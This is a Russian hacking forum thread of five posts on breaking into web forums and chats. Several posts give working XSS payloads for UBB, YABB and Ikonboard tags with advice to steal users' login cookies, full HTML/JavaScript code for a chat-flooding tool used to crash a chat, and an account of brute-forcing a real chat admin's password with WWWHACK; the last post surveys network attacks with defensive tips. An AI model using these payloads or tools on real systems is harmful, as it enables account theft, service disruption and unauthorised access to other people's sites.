Хакер - не преступник. Взлом - для искусства. Смысл - в свободе.

Fantom

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Fantom » Взлом » Взлом (разное)


Взлом (разное)

Сообщений 1 страница 9 из 9

1

Взлом UBB / YABB / IB форумов

1. Через UBB тег -- такой тег вставляет в сообщение картинку с адресом http://myserver.ru/logo.gif. При этом ничего не мешает вставить например такой тег --. Как вы догадываетесь, такой адрес будет выдавать каждому кто посмотрит на ваше сообщение алерт вместо картинки. Правда некоторые версии UBB требуют что бы указанный адрес указывал на файл с расширениями gif или jpg, но эта проблема легко решаема. Просто ставим в конце точку с запятой и имя файла картинки : --. Конечно это повлечет ошибку джава скрипта, но нам уже все равно, поскольку первая часть скрипта сработает :). Есть еще одна дыра в теге IMG: в некоторых версиях этот тег пропускает кавычку, как результат работает следующий пример: --` style="background-image:url('javascript:alert()')". Результат- тот же самый что и в первом примере.

Приведенный глюк работает как в UBB так и в YABB форумах. Учитывая еще тот факт, что UBB форум хранит пароль и логин пользователя в кукисах, которые читаются страничкой форума, и хранятся в переменных, то запустив в тело чата сниффер, мы можем легко выковырять пароли и логины всякого пользователя, который посмотрит на наш мессаг :)).

2. Как уже отмечалось, UBB форум хранит логин, ник и пароль пользователя в кукисах. Оказывается, что в некоторых случаях UBB форум берет ник пользователя не из своей БД, а из кукиса пользователя, при этом проверки ника на теги и любые символы не происходит! Таким образом, если в отсылаемом на сервер мессаге подделать кукис, и вставить вместо ника тег скрипта, то форум спокойно вставит этот тег в тело форума! Правда разработчики перемудрили, и в некоторых частях форума вставляются ники из БД, а в некоторых - из кукисов. Мне известны три случая, когда ник берется из кукиса: 1. На главной странице форума (там где пишется кто автор последнего сообщения в такой-то теме) 2. При ответе на реплику "с цитированием" - во фразе цитирования. 3. При редактировании сообщения (во фразе "отредактированно тем-то"). Отмечу, что 3.06.2002 фирма UBB выпустила патч на дырку в кукисах (не без моего скромного участия). Однако, несмотря на это, большинство форумов по прежнему используют старые версии :)).

3. А вот еще одна дырка в форумах Ikonboard: помимо того, что там срабатывает дырка связанная с тегом [IMG], там есть еще и дырка в теге [COLOR]. Например посылая в форум такое сообщение [color=red;background-image:url('javascript:alert()')]Привет[/color] на экран каждого кто просмотрит ваше сообщение выскочет алерт. Суть дыры думаю не стоит объяснять: понятно и так.

0

2

Взлом чата M

Как уже упоминалось в первой главе, существует два метода взлома чатов. Все приведенные выше примеры относились к первому методу - методу проникновения в параметры тега. Здесь я хочу показать технологию второго метода - метода нарушения структуры HTML.

> Цвет сообщений в чате М задавался в числовом виде (и потому имел ограничение на длинну цвета - 7 символов), имел причудливые фильтры, но пропускал одиночный символ ' . Вот фрагмент сообщений в чате:

<font class="а1">22:41:24 </font> <a href= "javascript:parent.parent.sewho('РТУТЬ')"onMouseOver="window.status='';return true;" target=kbd><font color=#0066ff class="ку">РТУТЬ:</font></a><font color=#FF0000 class="уц">ПЛУГиПРЕЙ:КОРОШО!</font><br>
<SCRIPT>top.do_scrolldown();</SCRIPT>
<font class="а1">22:41:25 </font> <a href= "javascript:parent.parent.sewho('Весь_в_сертах')"onMouseOver="window.status='';return true;" target=kbd><font color=#0000FF class="ку">Весь_в_сертах:</font></a><font color=#0000FF class="уц">Денис_Семенов: ПРАВИЛЬНЕЙ БУДЕТ ВСЕ</font><br>
<SCRIPT>top.do_scrolldown();</SCRIPT>

Как видим цвет указывался без обрамляющих кавычек. Технология взлома проста: логинимся под произвольным ником, и цветом '. Затем, войдя в чат, выдаем сообщение типа ' style=background-image:url(javascript:alert('Hello_people!!')) . Обратим внимание на пробел в конце - он обязателен. Наше сообщение выглядит следующим образом:

<font class="а1">22:41:24 </font> <a href= "javascript:parent.parent.sewho('Algol')"onMouseOver="window.status='';return true;" target=kbd><font color=#0066ff class="ку">Algol:</font></a><font color=' class="уц">' style=background-image:url(javascript:alert('Hello_people!!')) </font><br>
<SCRIPT>top.do_scrolldown();</SCRIPT>

При этом оказывается, что часть HTML кода -  class="уц"> - оказалась внутри одинарных кавычек,и рассматривается браузером как строка-значение цвета. В эту строку попадает и закрывающая угловая скобка тега, благодаря чему наше сообщение оказывается внутри тега! Часть кода, идущая непосредственно после нашего сообщения </font не понимается браузером и игнорируется (причем эта часть должна быть отделена пробелом от нашего параметра style, иначе параметр вцелом будет считаться ошибочным) , а вот вслед идущая угловая скобка считается закрывающей тег font . Все очень просто.

0

3

87668964 Заходит в чат
5480654 Заходит в чат
30978569 Заходит в чат
Admin: А А А А А А А А А А А А А
34565469 Заходит в чат
74564 Заходит в чат
.......

Random[XV]
Продолжая тему FA , я решил написать еще одну статью, которая теперь уже точно соответствует своему названию. Внимание: используйте это исключительно для борьбы с "отмороженными" админами, которые от безделья или чтобы показать свои возможности выкидывают из чата по любой причине и без нее. Не используйте этот способ в чатах, где вам дают нормально общаться, т.к. вы не дадите поговорить никому, потому что в чат будет заходить большое количество разных "людей" причем их будет так много, что говорить в чате станет невозможно... Другими словами это "Nick Flooding" или наполнение чата несуществующими посетителями.
Сохраняем на диск стартовую страницу.
Для реализации вам потребуется чат со входом без регистрации и немного знания html(хотя-бы что это такое) . Сохраняем стартовую страницу чата, это где написано "Введите ваш ник" 

   Код примерно такой

<html><body>......................

<FORM action=/cgi-bin/chat/login.cgi method=post name="chat_x">  -путь куда отправляются данные
Введите ваш ник: <input type=text name=Nick> -Тут вводится ник
<INPUT name=color type=hidden value=red>  -цвет
<INPUT type=submit value="Начать!!!" > -кнопка

.....................</html></body>   

А так это выглядит в Броузере:   Введите ваш ник   

Если у вас стартовая страница загружается в виде фреймов, т.е. уже видно сообщения и внизу написано "Введите ваш ник" (обычно это самый нижний фрейм) надо щелкнуть там(внизу) правой кнопкой и выбрать "Просмотр в виде html" там вы увидите тоже что и в первом случае, возможно что код будет посложнее.

если вы умеете работать с чатом с диска (подробно здесь) и в данном чате это возможно, то  код нижнего фрейма после первой сказанной фразы будет содержать следующее :

<html><body>......................

<FORM action=/cgi-bin/chat/login.cgi method=post name="chat_x">  -путь куда отправляются данные
<input type=hidden name=Nick value = Ваш ник> -ник (его не видно)
<INPUT name=color type=hidden value=red>  - цвет
Введите фразу  <INPUT TYPE=TEXT name=say size="24"> -поле ввода фразы
<INPUT type=submit value="Сказать!!!" > 

.....................</html></body>     

Если этот чат находится по адресу http://www.domen.ru то в строчку <FORM action= /cgi-bin/chat/login.cgi method=post name="chat_x"> прописываем этот адрес и получаем: <FORM action= http://www.domen.ru/cgi-bin/chat/login.cgi method=post name="chat_x"> теперь запускаем этот файл и заходим из него в чат, name="chat_x" может отсутствовать, тогда можно добавить его самому. Вместо chat_x.оно может называться и по другму. Если получается заходить в чат из этого файла, переходим к следующей части.

Первая фишка: генерируем "Посетителей чата"

Если использовать для наших целей один ник, то больше 2-3 фраз он не протянет...выкинут. Значит надо чтобы ник всегда был разный в этом нам поможет Java script (вам его знать не обязательно, просто подставите свои цифры) Math.floor(Math.random()*100000000)

Пример можно увидеть нажав на кнопку:   

Пояснение: Математический объект Math: Math.random() генерирует число от 0 до 1, затем это число округляется при помощи Math.floor() и чтобы оно было целое надо умножить например на 10 тогда будет генерироваться число от 0 до 9, если умножть на 100, то до 99, если умножить на 1000, то до 999 и .т.д. т.е. длина получаемого в результате числа,  меньше или равна количеству нулей в том числе на которое умножали.... блин, сам уже запутался:-))) В примере(см. ниже) это число равно 100000000  вызывая который мы получим случайное число, это и будет ник...
Для того чтобы это число вписалось в форму для ника, ставим его в автозагрузку страницы, т.е. в тег <body> после этого получится: <body  onload="document.chat_x.nick.value =(Math.floor(Math.random()*1000000))"> обратите внимание на название формы (см. пример html-кода выше, оно выделено желтым цветом) это нужно для того, чтобы случайное число вписывалось в нужную форму и в нужное поле.

Вторая фишка: Отправляем "посетителей" в чат.

<script Language="JavaScript">
function submit() {
Timer= setTimeout(" (document.chat_x.submit())",1000);
}
</script>

Этот скрипт как бы "Нажимает" кнопку "Submit" и отпраляет данные из формы с названием chat_x, в чате эта кнопка может называться "Войти в чат" или "Сказать", делает он это с задержкой 1000 мс, это чтобы вы могли сначала увидеть что загрузилось (позднее можно поставить 100), а потом данные автоматически отправляются, но для этого надо прописать функцию отправки submit() в автозагрузку нашей страницы т.е.  в тег <body onload="document.chat_x.nick.value =(Math.floor(Math.random()*1000000));submit()"> теперь при загрузке страницы выбирается случайное число, потом оно записывается в форму chat_x в поле nick. и данные из формы chat_x отправляются на сервер, получается что в чат зашел чел с ником в виде нескольких чисел. 

Пример html-кода простого чат-флудера

<HTML><HEAD><TITLE>Chat Flooder</TITLE>

<script Language="JavaScript">
function submit() {
Timer= setTimeout(" (document.chat_x.submit())",1000);
}
</script>

</HEAD>
<BODY bgColor=#000066 onload="document.chat_x.nick.value=(Math.floor(Math.random()*1000000));submit()">
<FORM action=http://www.domen.ru/cgi-bin/chat/chat.cgi method=post name="chat_x">
<input name=color type=hidden value=red>
Nick:<input name=nick type=text>
<INPUT type=submit value="Начать!!!"> 
</BODY></HTML>

Последнее... сам флудинг

Для этого есть три способа.

1.Создаем файл содержащий два фрейма, в одном файл, который при загрузке создает ник и отправляет его в чат, назовем его forma.htm, а во втором фрейме любой другой файл, у меня в примере это yo.htm. И сохраняем его с именем frames.htm Код этого документа будет такой:

Содержание файла frames.htm

<html><head><title>Chat Flooder</title></head>
<frameset rows="*,100">
<frame name="main" src="forma.htm">
<frame name="send" src="yo.htm">
<noframes><body>
<p>This page uses frames, but your browser doesn't support them.</p>
</body></noframes></frameset>

Имя фрейма send я выделил специально, т.к. данные будут отправляться в него, чтобы файл forma.htm после отправки не выгружался. Далее в коде forma.htm дописываем следующее: в тег <FORM action=.....target="send"> и в начало документа строчку: <meta http-equiv="Refresh" content="1"> чтобы файл сам обновлялся каждую секунду ,и ставим Timer=0. Что получилось: Файл обновляется и посылает в чат посетителя, это видно во фрейме с именем SEND т.е. вместо файла yo.htm появляется чат, потом forma.htm обновляется и опять посылает нового чела в чат, и опять обновляется и опять в чат заходит новый... так до безконечности:) Частота обновления ставится исходя из скорости подключения.

Пример содержания файла forma.htm

<HTML>
<HEAD><TITLE>Chat Flooder</TITLE>
<meta http-equiv="Refresh" content="1">
<script Language="JavaScript">
function submit() {
Timer= setTimeout(" (document.chat_x.submit())",0);
}
</script>

</HEAD>
<BODY bgColor=#000066 onload="document.chat_x.nick.value=(Math.floor(Math.random()*1000000));submit()">
<FORM action=http://www.domen.ru/cgi-bin/chat/chat.cgi method=post name="chat_x" target="send">
<input name=color type=hidden value=red>
Nick:<input name=nick type=text>
<input name=password type=hidden value="">
<INPUT type=submit value="Начать!!!"> 
</BODY></HTML>

2 Способ.  Сначала делаем 4 файла которые будут отличаться только задержкой при отправке и один фреймовый файл в котором будет например 16(!) фреймов, в первой четверке первый файл, в нем  Timer= setTimeout(" (document.chat_x.submit())",1000); Во второй четверке фреймов загружается второй файл в котором задержка равна 10000. В третьей четверке- 30000. Ну а в четвертой четверке загрузится четвертый файл с задержкой 40000 т.е. каждые 10000мс в чат будут заходить 4 "человека" и все разные, правда они будут в виде цифр но это фигня... Если вы использовали форму входа в чат то все они будут "заходить" в чат, а если форму отправки сообщения, то можно вписать еще в качестве сообщения абзац текста, тогда каждый сгенерированный ник будет говорить... Экспериментируйте, пробуйте другие варианты с фреймами...

Осталось только скрыть свой IP, для этого можно воспользоваться A4Proxy, набрать большой список серверов....

3 Способ.  если у вас есть сайт, то можно разместить эти файлы на него, например в скрытом фрейме, тогда и IP всегда будет разный...

Валим чат:)

Чаты использующие систему приватов, так устроены, что постоянно находятся "на связи" с компьютером пользователя, т.е. постоянно генерируют для него поток сообщений и следят не отключился ли он еще, и если юзрверей становится слишком много то чат может не выдержать и "упасть". Так вот, недавно я был в чате который выдерживает максимум 70 человек, потом просто перестает работать,  хоть стартовая страница и загружается... Положить такой чат "вручную" оказалось не трудно, надо было просто сделать файл который генерит ники и посылает их в чат, через минуту после запуска этого файла, в чате к существующим 23-м прибавилось еще примерно 50 человек:)) и он ессесно упал (я использовал файл из множества фреймов, в которых был один и тот же файл) И надо отметить, что я был в клубе а там большая скорость и мощнные компы:). Может и с модема тоже получится (типа договориться с кем-то и одновременно начать) или сначала попробовать самому, не знаю... Не забывайте что чаты ведут логи и у админов после этого может появиться желание посмотреть что-же это было такое:) Теперь доступ с IP-адреса интернет-клуба "GeForce" в этот чат закрыт:)
FAQ: Если не получается

FlooDer: У меня ничего не получается:)
Попробуй сначала просто зайти в чат с диска, т.е. из сохраненной на винт формы входа, если все получилось, значит ошибка в коде "скрипта-флудера":), если не получилось, то читай дальше...

FlooDer: Зашел с диска, теперь не получается отправить данные:) что делать?
Проверь правильность названия форм (name=XxXxX)

FlooDer: В строке <FORM action=http://www.***.ru/chat.cgi method=post> вообще нет name="XxXxX", что делать?
Вставь сам: (name="chat_x" target="send")  target- чтобы данные отправлялись во фрейм send, получится  так: <FORM action=http://www.***.ru/chat.cgi method=post name="chat_x" target="send">

FlooDer: При входе в чат надо вводить пароль, подходит любой если ник не зарегистрирован, как его вписать в код?
В форме для ввода пароля надо добавить: value="abrakadabra" тогда с этим паролем будут входить все сгенеренные "юзеры"

Прежде чем писать мне если, что-то не получается, внимательно все проверьте!!! Рабочие примеры не выкладываю специально т.к. их придется все время апгрейдить, во-вторых, я думаю что флудить чаты - плохо:)

0

4

Подбор паролей с помощью WWWHACK
Всем всегда хотелось быть администратором в чате или на худой конец побезобразничать: удалить базу ползователей, поудалять их в бан и т.д. Теперь это стало очень просто.

Все, что нам надо - это имя админа или кила а далше все дело техники сразу скажу что чаты таких классов как divan.ru в этом способе вам не по зубам потому, что слишком крутые и я считаю что их портить нельзя, потому что там просто так не банят. А вот в чатах, где админам делть нечего, так это пожалуйста.

Пример получения админских прав будет расмотрен на примере чата newboltalka.ru. Хотя, к сожалению, этот способ там не действует, после того, как я там побезабразничал.

Сижу я в инете, лажу по сайтам халявы. И вижу объявление, что есть программа, которая позваляет лазать по порно сайтам бесплатно. Ну, думаю, повеселюсь сегодня с подругой. Скачал её, ну и пошарившысь в ней, оказалось, что это программа по подборке паролей к сайтам. Ну, я думаю, испытаю я эту програму на этом ненавистном чате. Ну конечно, у меня был список ползователей этого чта. Ввел я их в файл. И прогнал пароли которые были даны с програмой. Конечно, ничего не плучилось, потому что это былы английские имена. А кто из наших их пользует? Вот я и уныл. Но вдруг думаю может быть побрякать на клаве удобные сочетания паролей с цифрами и с букавами. Ну набрякал и запустил прогу. И тут-то почти сразу вылез пароль главного админа- лося А потому пароль выпал, что админ использовал пароль 1. Видно ему лень стучать долго по клаве при входе в чат. Вот так я отомстил админам.

Краткое описание использования программы для средней продвинутости пользователей
Программа называется wwwhack это по-моему единственная порга которая работает в инете и не требует всякой возни с ней. Скачать програмку можно например Здесь.

Когда запустили прогу, то для получения паролей, заходите в меню access/web page (HTML form), и в графе Enter URL - имя на входной страничке чата, например http://newboltalka.ru/chat. Далее нажимаете get info И програма пытается автоматически получить инфу о полях. Если не получится - заполняете поля вручную. Затем нажимаете OK. Если все хорошо, то появляется другое окно. Здесь я хочу остановиться на key phrase. Там нужно ввести ту фразу, которую чат использует при ошибке набора пароля. Она может быть скрыта, поэтому надо будет посмотреть HTML. Затем, если все ввели верно, то программа начнет щелкать пароли со скоростю до 1000 в минуту. Все предельно просто. Я список своих паролей не буду публиковать, чтобы админы не знали, так не интересно будет.

Если есть вопросы, пробелемы или пожелания, то пишите мне на мыло. Еще раз хочу сказать, что этот способ подходит и не только для чатов. В обшем, эксперементируйте.

Счастливо, желаю добиться успехов.

0

5

Приемы взлома
1)      Fishing (или Фишинг). Очень широкое понятие. Смысл его в том, чтобы получить от пользователей информацию (пароли, номера кредитных карт и т.п.) или деньги. Этот приём направлен не на одного пользователя, а на многих. Например, письма якобы от службы технической поддержки рассылаются всем известным клиентам какого-либо банка. В письмах обычно содержится просьба выслать пароль к учётной записи, якобы из-за проведения каких-либо технических работ. Несмотря на то, что пользователей предупреждают, что никакую подобную информацию от них никто из работников не может потребовать, и эта информация не должна разглашаться, всегда находятся те, кто с удовольствием «дарит» свои номера, пароли и прочее. Подобные письма, обычно очень правдоподобно и грамотно составлены, что, возможно, подкупает доверчивых пользователей. Нужно оговориться, что приёмов для фишинга есть несколько, помимо писем. Некоторые из нижеприведённых приёмов при правильном применении подходят для фишинга (как правило, мы упоминаем об этом при описании приёма).

Рекомендации: Помните, что паранойя – лучшая защита. Не доверяйте ничему подозрительному, никому не давайте свои данные. Администраторам не нужно знать Ваш пароль, если он предназначен для доступа к их серверу. Они полностью управляют сервером  и могут сами посмотреть пароль или изменить его.

2)      Социальная инженерия – это не технический, а психологический приём. Пользуясь данными, полученными при инвентаризации, взломщик может позвонить какому-либо пользователю (например, корпоративной сети) от имени администратора и попытаться узнать у него, например, пароль. Это становится возможным, когда в больших сетях, пользователи не знают всех работников, и тем более не всегда могут точно узнать их по телефону. Кроме этого, используются сложные психологические приёмы, поэтому шанс на успех сильно возрастает.

Рекомендации: те же самые. Если действительно есть необходимость, то сообщите нужные данные лично. В том случае, если Вы записали пароль на бумаге, не оставляйте её где попало и по возможности уничтожайте, а не просто выбрасывайте в мусорную корзину.

3)      Вирусы. Самая известная простому пользователю проблема. Суть во внедрении вредоносной программы в компьютер пользователя.  Последствия могут быть различны и зависят от вида вируса, которым заражён компьютер. Но в целом - от похищения информации до рассылки спама, организации DDoS атак, а так же получения полного контроля над компьютером. Помимо прикрепленного к письму файла, вирусы могут попасть в компьютер через некоторые уязвимости ОС, которые описываются в нашей статье «Рейтинг уязвимостей Windows». Вирусов существует огромное множество, но всё же возможно их классифицировать. Мы не хотим изобретать заново велосипед, поэтому можно воспользоваться информацией этой страницы http://school8.uriit.ru/people/av/class.html где приводится классификация вирусов с описанием. Чуть более подробно эта тема раскрывается здесь http://fivt.krgtu.ru/kafedri/mo/site/AN … ges/02.htm

Рекомендации: Пользуйтесь антивирусным ПО. Не ограничивайтесь только DrWEB или Kaspersky Anti-Virus (потому как они не проверяют реестр), используйте специализированные антивирусы против Malware, например Ad-Aware, SpyBot, XSpy. А так же не открывайте подозрительных вложений и вообще не отрывайте программ от неизвестных отправителей. Даже если отправитель Вам знаком, всё равно сначала проверьте антивирусом. Здесь как в медицине, легче избежать, чем потом вылечить.

4)      DoS (Denial of Service или Отказ от Обслуживания). Мы бы хотели сказать, что это скорее не отдельная атака, а результат атаки; используется для вывода системы или отдельных программ из строя. Для этого взломщик особым образом формирует запрос к какой-либо программе, после чего она перестаёт функционировать. Требуется перезарузка, чтобы вернуть рабочее состояние программы. Часто встречается мнение, что DoS, это то же самое, что и атака типа Flood и что вообще нужно соединить все атаки, которые приводят к отказу системы под общим названием DoS. Здесь стоит оговориться, что:

a)      Общей терминологии нет, есть скорее негласные правила, по которым классифицируется атака, поэтому даже в рамках данной статьи мы приведём, в чем-то расхожую классификацию.
b)      Как мы уже сказали, к отказу от обслуживания может привести не только Flood, но, например и Buffer Overflow.
Поэтому, DoS можно охарактеризовать как результат атаки. Например: «эффект отказа от обслуживания достигнут применением атаки типа Flood».

5)      Flood (Флуд или Поток/Затопление). Этот тип достаточно спорный, отчасти его можно отнести к DoS, но мы хотели бы выделить его отдельно. С некоторого количества машин (в этом случае атака будет называться DDoS Distributed Denial of Service. Распределенная атака на отказ от обслуживания), как правило «Зомби» посылают жертве максимально возможное количество запросов (например, запросы на соединение). От этого жертва не успевает отвечать на каждый запрос, и в итоге не отвечает на пользовательские запросы, т.е. можно сказать, что перестаёт нормально функционировать. Примечание: этот тип атаки можно назвать хулиганством, когда, например, форумы заполняют большим количеством бессмысленных сообщений. Можно выделить следующие типы Flood:

a)      SYN Flood – Затопление атакуемого компьютера пакетами типа SYN. Как известно, компьютер должен на такой пакет ответить пакетом типа SYN/ACK. Если пакетов SYN слишком много, то компьютер не успевает отвечать на каждый и не может принимать пакеты от других компьютеров.
b)      ICMP Flood или Ping Flood – То же самое, только пакетами ICMP. Система должна ответить на такой пакет, тем самым создаётся большое количество пакетов, которые снижают производительность (пропускную способность) канала.
c)      Identification Flood (Ident Flood). Похожа на ICMP Flood, но ответ на запрос на порт 113 типа identd занимает у системы больше времени, поэтому атака более эффективна.
d)      DNS Flood – атака направлена на DNS сервера. Их наводняют DNS запросы, на которые сервер не успевает отвечать, таким образом, на Ваши запросы он так же ответить не сможет. Как следствие, Вы не сможет посещать Интернет сайты.
e)      DDoS DNS – Атака достаточно новая, и мы не встречали «устоявшегося» названия. По сути, этот приём примерно то же самое, что и предыдущий, с той лишь разницей, что запросы поступают с большого количества машин (предыдущий тип этого не исключает). Адрес, по которому должен ответить DNS-сервер на эти запросы, равен адресу самого DNS сервера, т.е. его не только наводняют запросы DNS, но он же ещё и отправляет их себе же. Таким образом, приём более эффективен, чем предыдущий, но и более сложен в реализации.
f)        Boink (Bonk, Teardrop) – Жертве посылается огромное количество сильно фрагментированных пакетов, но при этом фрагменты большого размера. Для каждого фрагментированного пакета выделяется специальный буфер, в который в последствии будут помещены другие фрагменты, чтобы потом сложить их воедино. Огромное количество больших фрагментов переполняют буфера и могут спровоцировать зависание или аварийную остановку.
g)      Pong – то же самое, что и любой другой из вышеперечисленных видов, отличие только в том, что адрес отправителя поддельный. Это даёт взломщику некоторую анонимность.
Рекомендации: для каждой ОС или маршрутизатора свои; они, как правило, даны в технической документации. Не пренебрегайте ими, чётко ограничивайте количество допустимых пакетов. К сожалению, некоторые виды невозможно отразить ничем, кроме физического отключения. Правильно настроенные межсетевые экраны (или Брандмауэры) часто являются панацеей.

6)      Smurf (атака, направленная на ошибки реализации TCP-IP протокола). Сейчас этот вид атаки считается экзотикой, однако раньше, когда TCP-IP протокол был достаточно новым, в нём содержалось некоторое количество ошибок, которые позволяли, например, подменять IP адреса. Однако, этот тип атаки применяется до сих пор. Некоторые специалисты выделяют TCP Smurf, UDP Smurf, ICMP Smurf. Конечно, такое деление основано на типе пакетов.

Рекомендации: коммутаторы CISCO предоставляют хорошую защиту, как и многие другие, а также свежее ПО и межсетевые экраны; необходимо блокировать широковещательные запросы.

7)      Ping-of-Death (или Jolt, SSPing) – Атака заключается в том, что жертве посылается фрагментированный ICMP пакет, но размер фрагмента очень большой (64кБ). Старые версии ОС, например Windows 95, повисают. Эту атаку можно осуществить с помощью программы Shadow Security Scanner.

Рекомендации: легче всего обновить ОС, отказавшись от старой версии.

8)      UDP Storm (UDP шторм) – используется в том случае, если на жертве открыто как минимум два UDP порта, каждый из которых отсылает отправителю какой-нибудь ответ. Например, порт 37 с сервером time на запрос отправляет текущую дату и время. Взломщик отправляет UDP пакет на один из портов жертвы, но в качестве отправителя указывает адрес жертвы и второй открытый UDP порт жертвы. Тогда порты начинают бесконечно отвечать друг другу, что снижает производительность. Шторм прекратится, как только один из пакетов пропадёт (например, из-за перегрузки ресурсов).

Рекомендации: по возможности исключить использование сервисов, которые принимают UDP пакеты, либо отрезать их от внешней сети межсетевым экраном.

9)      UDP Bomb – взломщик отправляет системе UDP пакет с некорректными полями служебных данных. Данные могут быть нарушены как угодно (например, некорректная длина полей, структура). Это может привести к аварийному завершению.

Рекомендации: обновите ПО.

10)  Land – жертве посылается пакет на определённый порт, но адрес отправителя устанавливается тот же самый, что и жертвы, а порт отправителя равен порту получателя. (пример: получатель: 1.1.1.1 порт 111 отправитель: 1.1.1.1 порт 111). Жертва пытается установить соединение с собой, отчего может произойти повисание системы. Подобная атака также может быть на 100% эффективна против некоторых маршрутизаторов.

11)  Mail Bombing («Почтовая бомбёжка»). Если на атакуемом компьютере есть почтовый сервер, то на него посылается огромное количество почтовых сообщений с целью вывода его из строя. С одной стороны, это напоминает Flood, но с другой стороны, если сообщения содержат большие вложения, которые будут проверяться серверным антивирусом, то подобная проверка множества входящих вложений может существенно снизить производительность или свести её на нет. Кроме того, такие сообщения сохраняются на жёстком диске сервера и могут переполнить его, что может вызвать DoS. Конечно, сейчас эта атака, скорее история, но в некоторых случаях всё же может быть использована.

Рекомендации: грамотная настройка почтового сервера.

12)  Sniffing (Сниффинг или прослушивание сети). В том случае, если вместо коммутаторов в сети установлены концентраторы, полученные пакеты рассылаются всем компьютерам в сети, а дальше уже компьютеры определяют для них этот пакет или нет. Если взломщик получит доступ к компьютеру, который включен в такую сеть, или получит доступ к сети непосредственно, то вся информация, передаваемая в переделах сегмента сети, включая пароли, станет доступна. Взломщик просто поставит сетевую карту в режим прослушивания и будет принимать все пакеты независимо от того, ему ли они предназначались. Можно использовать как консольные снифферы, например TcpDump (встроенный в *NIX системах), WinDump (для Windows, но не встроенный), а так же с визуализированным интерфейсом, например Iris.

Рекомендации: используйте коммутаторы вместо концентраторов, шифруйте трафик.

13)  IP Hijack (IP хайджек). Если есть физический доступ к сети, то взломщик может «врезаться» в сетевой кабель и выступить в качестве посредника при передаче пакетов, тем самым он будет слушать весь трафик между двумя компьютерами. Очень неудобный способ, который часто себя не оправдывает, за исключением случаев, когда никакой другой способ не может быть реализован. Подобное включение само по себе неудобно, хотя есть устройства, которые немного упрощают эту задачу, в частности они следят за нумерацией пакетов, чтобы избежать сбоя и возможного выявления вторжения в канал. Такой способ используется для обмана банкоматов, но такой случай технически сложнее, потому что недопустим разрыв связи между банком и банкоматом, а «врезание» в канал без его разрыва – задача только для высококвалифицированного специалиста. Кроме этого, теперь банкоматы устанавливаются гораздо лучше, что исключает возможность свободного физического доступа к кабелю.

Рекомендации: следите за доступом к кабелям, например, используйте короба. Шифруйте трафик.

14)  Dummy ARP (Ложный ARP). ARP сервер, маршрутизатор или коммутатор знают какие IP принадлежат MAC адресам (т.е. сетевым картам). При возможности физического доступа к сети, взломщик может подделать ARP ответ и выдать себя за другой компьютер в сети, получив его IP. Тем самым все пакеты, предназначенные тому компьютеру, будет получать он. Это возможно, если тот компьютер выключен, иначе это действие вызовет конфликт IP адресов (в одной сети не могут быть 2 компьютера с одним и тем же IP адресом).

Рекомендации: используйте ПО, которое информирует об изменении MAC адресов у IP, следите за лог-файлами ARP сервера.

15)  Dummy DNS Server (ложный DNS Сервер). Если настройки сети поставлены в автоматический режим, то при включении в сеть, компьютер «спрашивает» (т.е. отправляет широковещательный пакет) кто будет его DNS сервером, к которому он в дальнейшем будет отправлять DNS запросы. При наличии физического доступа к сети, взломщик может перехватить такой широковещательный запрос и ответить, что его компьютер будет DNS сервером. После этого он сможет отправлять обманутую жертву по любому маршруту. Например, жертва хочет пройти на сайт банка и перевести деньги, взломщик может отправить её на свой компьютер, где будет сфабрикована форма ввода пароля. После этого пароль будет принадлежать взломщику. Достаточно сложный способ, потому что взломщику необходимо ответить жертве раньше, чем DNS сервер.

Рекомендации: по возможности ограничьте доступ к сети посторонних.

16)  Fuzzy (Фаззи). Фильтры могут быть настроены на блокировку определённых видов пакетов, например UDP. Взломщик может сфабриковать пакет так, что фильтр не поймет, что этот пакет UDP и не отфильтрует его, и он попадёт по назначению. Таким образом, взломщик может обойти фильтры пакетов. Этот приём очень узкий и предназначен для частных случаев, точнее тех, когда связь не обязательно должна быть двусторонней. Двусторонняя связь будет невозможна в большинстве случаев, т.к. в основном, если блокируются входящие пакеты определённого типа на какой-либо порт, то блокируются и исходящие. Получается, что даже если сфабрикованный пакет пройдёт через фильтр (например на порт UDP), то сервер ответит на него пакетом того же типа, т.е. UDP, но при этом он не будет его фабриковать по примеру взломщика. Т.о. этот исходящий пакет будет отфильтрован и не попадёт к взломщику. Как бы там ни было, всё равно стоит обезопасить себя от подобного рода атак.

Рекомендации: обычно новые версии межсетевых экранов предоставляют достаточную защиту против этого приёма.

17)  Puke – взломщик фабрикует ответ ICMP unreachable (ошибка удалённой системы), что спровоцирует клиента на отключение от сервера. Используется скорее как вспомогательное средство, в том случае, если какой-либо клиент должен быть отключён от сервера для проведения атаки.

18)  Fake unreachable – взломщик фабрикует сообщение о том, что пакет не может быть доставлен (unreachable), тем самым заставляет сервер думать, что у клиента сбой и пакеты не доставляются по назначению. Это может спровоцировать сервер отключить клиента. Тоже вспомогательное средство, похоже на №17, только направлен не на клиента, а на сервер.

19)  IP-Spoofing (Спуфинг или Подмена IP адреса). Атакующий подменяет свой реальный IP фиктивным. Это необходимо, если доступ к ресурсу имеют только определённые IP адреса. Взломщику нужно изменить свой реальный IP на «привилегированный» или «доверенный», чтобы получить доступ. Этот способ может быть использован по-другому. После того, как два компьютера установили между собой соединение, проверив пароли, взломщик может вызвать на жертве перегрузку сетевых ресурсов специально сгенерированными пакетами. Тем самым он может перенаправить трафик на себя и таким образом обойти процедуру аутентификации.

Рекомендации: их может быть много, по той причине, что приёмов достаточно много. Но стоит упомянуть, что угрозу снизит (но возможно затруднит легимитивные соединения) уменьшение времени ответного пакета с установленными флагами SYN и ACK, а также увеличить максимальное количество SYN-запросов на установление соединения в очереди (tcp_max_backlog). Так же можно использовать SYN-Cookies.

20)  Host spoofing (Подмена хоста). Очень сложная техника, требующая физического доступа к сети. Каждый компьютер знает маршрутизатор, на который он отправляет все пакеты, которые потом маршрутизатором доставляются по назначению. При смене маршрутизатора каждому компьютеру высылается redirect уведомление, после чего компьютеры начинают посылать пакеты новому маршрутизатору. Взломщик может сфабриковать подобное уведомление и выдать себя за маршрутизатор, таким образом он получит контроль над трафиком в пределах сегмента сети.

Рекомендации: контроль над доступом к сети и момента смены маршрутизатора. Например, можно следить, весь ли прошлый трафик (т.е. старые соединения) «появились» на новом маршрутизаторе.

